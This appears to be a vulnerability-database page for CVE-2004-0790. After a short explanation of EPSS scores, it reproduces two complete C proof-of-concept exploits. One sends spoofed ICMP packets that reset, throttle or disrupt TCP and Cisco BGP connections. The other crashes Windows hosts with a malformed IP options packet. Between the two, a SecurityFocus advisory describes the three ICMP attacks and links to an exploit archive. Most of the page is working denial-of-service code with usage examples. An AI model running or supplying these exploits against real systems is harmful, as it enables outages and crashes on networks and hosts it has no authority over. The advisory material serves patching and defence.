CVE-2004-0790 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2 * * Copyright (c) 2004-2005 houseofdabus. * * (MS05-019) (CISCO:20050412) * ICMP attacks against TCP (Proof-of-Concept) * * * * .::[ houseofdabus ]::. * * * * [ for more details: * [ http://www.livejournal.com/users/houseofdabus * --------------------------------------------------------------------- * Systems Affected: * - Cisco Content Services Switch 11000 Series (WebNS) * - Cisco Global Site Selector (GSS) 4480 1.x * - Cisco IOS 10.x * - Cisco IOS 11.x * - Cisco IOS 12.x * - Cisco IOS R11.x * - Cisco IOS R12.x * - Cisco IOS XR (CRS-1) 3.x * - Cisco ONS 15000 Series * - Cisco PIX 6.x * - Cisco SAN-OS 1.x (MDS 9000 Switches) * - AIX 5.x * - Windows Server 2003 * - Windows XP SP2 * - Windows XP SP1 * - Windows 2000 SP4 * - Windows 2000 SP3 * ... * * --------------------------------------------------------------------- * Description: * A denial of service vulnerability exists that could allow an * attacker to send a specially crafted Internet Control Message * Protocol (ICMP) message to an affected system. An attacker who * successfully exploited this vulnerability could cause the affected * system to reset existing TCP connections, reduce the throughput * in existing TCP connections, or consume large amounts of CPU and * memory resources. * (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060) * * --------------------------------------------------------------------- * Solution: * http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx * http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml * * Other References: * http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html * http://www.kb.cert.org/vuls/id/222750 * * --------------------------------------------------------------------- * Tested on: * - Windows Server 2003 * - Windows XP SP1 * - Windows 2000 SP4 * - Cisco IOS 11.x * * --------------------------------------------------------------------- * Compile: * * Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c * Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c * Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c * * --------------------------------------------------------------------- * Examples: * * client <---> router <---> router <---> server * * CLIENT <---> SERVER * * HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1 * (abort the connection) * * HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2 * (slow down the transmission rate for traffic) * * * ROUTER1 <---> ROUTER2 * * HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1 * (DoS Cisco BGP Connections) * * HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2 * (slow down the transmission rate for traffic) * * --------------------------------------------------------------------- * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission * to do so. * */ /* #define _WIN32 */ #ifdef _WIN32 #pragma comment(lib,"ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #include <winsock2.h> /* IP_HDRINCL */ #include <ws2tcpip.h> #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #endif #include <string.h> #include <stdio.h> #include <stdlib.h> #define MAX_PACKET 4096 #define DEFAULT_PORT 80 #define DEFAULT_IP "192.168.0.1" #define DEFAULT_COUNT 1 /* Define the IP header */ typedef struct ip_hdr { unsigned char ip_verlen; /* IP version & length */ unsigned char ip_tos; /* IP type of service */ unsigned short ip_totallength; /* Total length */ unsigned short ip_id; /* Unique identifier */ unsigned short ip_offset; /* Fragment offset field */ unsigned char ip_ttl; /* Time to live */ unsigned char ip_protocol; /* Protocol */ unsigned short ip_checksum; /* IP checksum */ unsigned int ip_srcaddr; /* Source address */ unsigned int ip_destaddr; /* Destination address */ } IP_HDR, *PIP_HDR; /* Define the ICMP header */ /* Destination Unreachable Message */ typedef struct icmp_hdr { unsigned char type; /* Type */ unsigned char code; /* Code */ unsigned short checksum; /* Checksum */ unsigned long unused; /* Unused */ } ICMP_HDR, *PICMP_HDR; /* 64 bits of Original Data Datagram (TCP header) */ char msg[] = "\x00\x50" /* Source port */ "\x00\x50" /* Destination port */ "\x23\x48\x4f\x44"; /* globals */ unsigned long dwToIP, /* IP to send to */ dwFromIP; /* IP to send from (spoof) */ unsigned short iToPort, /* Port to send to */ iFromPort; /* Port to send from (spoof) */ unsigned long dwCount; /* Number of times to send */ unsigned long Attack; void usage(char *progname) { printf("Usage:\n\n"); printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]\n\n", progname); printf(" -fi:IP From (sender) IP address\n"); printf(" -ti:IP To (target) IP address\n"); printf(" -fp:int Target open TCP port number\n"); printf(" (for example - 21, 25, 80)\n"); printf(" -tp:int Inicial value for bruteforce (sender) TCP port number\n"); printf(" (default: 0 = range of ports 0-65535)\n"); printf(" -n:int Number of packets\n\n"); printf(" -a:int ICMP attacks:\n"); printf(" 1 - Blind connection-reset attack\n"); printf(" (ICMP protocol unreachable)\n"); printf(" 2 - Path MTU discovery attack\n"); printf(" (slow down the transmission rate)\n"); printf(" 3 - ICMP Source Quench attack\n"); exit(1); } void ValidateArgs(int argc, char **argv) { int i; iToPort = 0; iFromPort = DEFAULT_PORT; dwToIP = inet_addr(DEFAULT_IP); dwFromIP = inet_addr(DEFAULT_IP); dwCount = DEFAULT_COUNT; Attack = 1; for (i = 1; i < argc; i++) { if ((argv[i][0] == '-') || (argv[i][0] == '/')) { switch (tolower(argv[i][1])) { case 'f': switch (tolower(argv[i][2])) { case 'p': if (strlen(argv[i]) > 4) iFromPort = atoi(&argv[i][4]); break; case 'i': if (strlen(argv[i]) > 4) dwFromIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 't': switch (tolower(argv[i][2])) { case 'p': if (strlen(argv[i]) > 4) iToPort = atoi(&argv[i][4]); break; case 'i': if (strlen(argv[i]) > 4) dwToIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 'n': if (strlen(argv[i]) > 3) dwCount = atol(&argv[i][3]); break; case 'a': if (strlen(argv[i]) > 3) Attack = atol(&argv[i][3]); if ((Attack > 3) || (Attack < 1)) usage(argv[0]); break; default: usage(argv[0]); break; } } } return; } /* This function calculates the 16-bit one's complement sum */ /* for the supplied buffer */ unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum = 0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char *)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (unsigned short)(~cksum); } int main(int argc, char **argv) { #ifdef _WIN32 WSADATA wsd; #endif int s; #ifdef _WIN32 BOOL bOpt; #else int bOpt; #endif struct sockaddr_in remote; IP_HDR ipHdr, ipHdrInc; ICMP_HDR icmpHdr; int ret; unsigned long i, p; unsigned short iTotalSize, iIPVersion, iIPSize, p2, cksum = 0; char buf[MAX_PACKET], *ptr = NULL; #ifdef _WIN32 IN_ADDR addr; #else struct sockaddr_in addr; #endif printf("\n (MS05-019) (CISCO:20050412)\n"); printf(" ICMP attacks against TCP (Proof-of-Concept)\n\n"); printf(" Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n"); if (argc < 3) usage(argv[0]); /* Parse command line arguments and print them out */ ValidateArgs(argc, argv); #ifdef _WIN32 addr.S_un.S_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort); addr.S_un.S_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort); printf("[*] Count: %d\n", dwCount); #else addr.sin_addr.s_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort); addr.sin_addr.s_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort); printf("[*] Count: %d\n", dwCount); #endif #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) { printf("[-] WSAStartup() failed: %d\n", GetLastError()); return -1; } #endif /* Creating a raw socket */ s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); #ifdef _WIN32 if (s == INVALID_SOCKET) { #else if (s < 0) { #endif printf("[-] socket() failed\n"); return -1; } /* Enable the IP header include option */ #ifdef _WIN32 bOpt = TRUE; #else bOpt = 1; #endif ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); #ifdef _WIN32 if (ret == SOCKET_ERROR) { printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } #endif /* Initalize the IP header */ iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc); iIPVersion = 4; iIPSize = sizeof(ipHdr) / sizeof(unsigned long); ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; /* IP type of service */ /* Total packet len */ ipHdr.ip_totallength = htons(iTotalSize); ipHdr.ip_id = htons(42451); /* Unique identifier */ ipHdr.ip_offset = 0; /* Fragment offset field */ ipHdr.ip_ttl = 255; /* Time to live */ ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */ ipHdr.ip_checksum = 0; /* IP checksum */ ipHdr.ip_srcaddr = dwFromIP; /* Source address */ ipHdr.ip_destaddr = dwToIP; /* Destination address */ ipHdrInc.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdrInc.ip_tos = 0; /* IP type of service */ /* Total packet len */ ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20); ipHdrInc.ip_id = htons(25068); /* Unique identifier */ ipHdrInc.ip_offset = 0; /* Fragment offset field */ ipHdrInc.ip_ttl = 255; /* Time to live */ ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */ ipHdrInc.ip_checksum = 0; /* IP checksum */ ipHdrInc.ip_srcaddr = dwToIP; /* Source address */ ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */ /* Initalize the ICMP header */ icmpHdr.checksum = 0; if (Attack == 1) { icmpHdr.type = 3; /* Destination Unreachable Message */ icmpHdr.code = 2; /* protocol unreachable */ icmpHdr.unused = 0; } else if (Attack == 2) { icmpHdr.type = 3; /* Destination Unreachable Message */ icmpHdr.code = 4; /* fragmentation needed and DF set */ icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */ } else { icmpHdr.type = 4; /* Source Quench Message */ icmpHdr.code = 0; icmpHdr.unused = 0; } memset(buf, 0, MAX_PACKET); ptr = buf; memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr); memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr); memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc); memcpy(ptr, msg, sizeof(msg)-1); iFromPort = htons(iFromPort); memcpy(ptr, &iFromPort, 2); remote.sin_family = AF_INET; remote.sin_port = htons(iToPort); remote.sin_addr.s_addr = dwToIP; cksum = checksum((unsigned short *)&ipHdrInc, 20); memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2); cksum = checksum((unsigned short *)&ipHdr, 20); memcpy(buf+10, &cksum, 2); for (p = iToPort; p <= 65535; p++) { p2 = htons((short)p); memcpy((char *)(ptr+2), &p2, 2); buf[22] = 0; buf[23] = 0; cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28); memcpy(buf+20+2, &cksum, 2); for (i = 0; i < dwCount; i++) { #ifdef _WIN32 ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote)); #else ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, sizeof(remote)); #endif #ifdef _WIN32 if (ret == SOCKET_ERROR) { #else if (ret < 0) { #endif printf("[-] sendto() failed\n"); break; } } } #ifdef _WIN32 closesocket(s); WSACleanup(); #endif return 0; } // milw0rm.com [2005-04-20]

source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message. Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection. The following individual attacks are reported: - A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue. A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users. - An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. - An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. **Update: Microsoft platforms are also reported prone to these issues. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25389.tar.gz

/* ecl-winipdos.c - 16/04/05 * Yuri Gushin <[email protected]> * Alex Behar <[email protected]> * * This one was actually interesting, an off-by-one by our beloved * M$ :) * * When processing an IP packet with an option size (2nd byte after * the option) of 39, it will crash - since the maximum available * size is 40 for the whole IP options field, and two are already used: * [ OPT ] [ SIZE ] [ 38 more bytes ] * Checks are done to validate that the option-size field is less than * 40, where a value less than !39! should be checked for validation. * * Note that this doesn't affect ALL options, and is also dependant upon * the underlying protocol. * Anyways, a small PoC to see how it works and why, tweak test and * explore, have fun :) * * * Greets fly out to the ECL crew, Valentin Slavov, blexim, stranger, * manevski, elius, shrink, Evgeny Pinchuk, Ishay Sommer, and anyone else * who got left out :D * */ #ifndef _BSD_SOURCE #define _BSD_SOURCE #endif #include <stdio.h> #include <string.h> #include <time.h> #include <libnet.h> #define IP_H 20 #define IPOPTS_MAX 40 void banner(); void usage(char *); int main(int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; char *device = NULL; int c; u_char *buf; int packet_len = 0; struct ip *IP; struct tcphdr *TCP; u_int32_t src = 0, dst = 0; banner(); if (argc < 4) usage(argv[0]); if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(-1); } if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved source address\n"); exit(-1); } if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved destination address\n"); exit(-1); } if ( (buf = malloc(IP_MAXPACKET)) == NULL ) { perror("malloc"); exit(-1); } buf[20] = atoi(argv[3]); buf[21] = 39; // our malformed size for (c = 0; c<38; c+=3) strncpy(&buf[22+c], "ECL", 3); // padding TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX); TCP->th_off = 5; packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2); srand(time(NULL)); IP = (struct ip *) buf; IP->ip_v = 4; /* version 4 */ IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */ IP->ip_tos = 0; /* IP tos */ IP->ip_len = htons(packet_len); /* total length */ IP->ip_id = rand(); /* IP ID */ IP->ip_off = htons(0); /* fragmentation flags */ IP->ip_ttl = 64; /* time to live */ IP->ip_p = IPPROTO_TCP; /* transport protocol */ IP->ip_sum = 0; IP->ip_src.s_addr = src; IP->ip_dst.s_addr = dst; TCP->th_sport = htons(1337); TCP->th_dport = htons(80); TCP->th_seq = 0; TCP->th_ack = 0; TCP->th_x2 = 0; TCP->th_flags = TH_SYN; TCP->th_win = rand() & 0xffff; TCP->th_sum = 0; TCP->th_urp = 0; libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2); if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); exit(-1); } printf("Packet sent.\n"); libnet_destroy(l); free(buf); return (0); } void usage(char *cmd) { printf("Usage: %s <source> <destination> <option>\n",cmd); exit(-1); } void banner() { printf("\t\tWindows malformed IP Options DoS exploit\n" "\t\t Yuri Gushin <[email protected]>\n" "\t\t Alex Behar <[email protected]>\n" "\t\t\t ECL Team\n\n\n"); } // milw0rm.com [2005-04-17]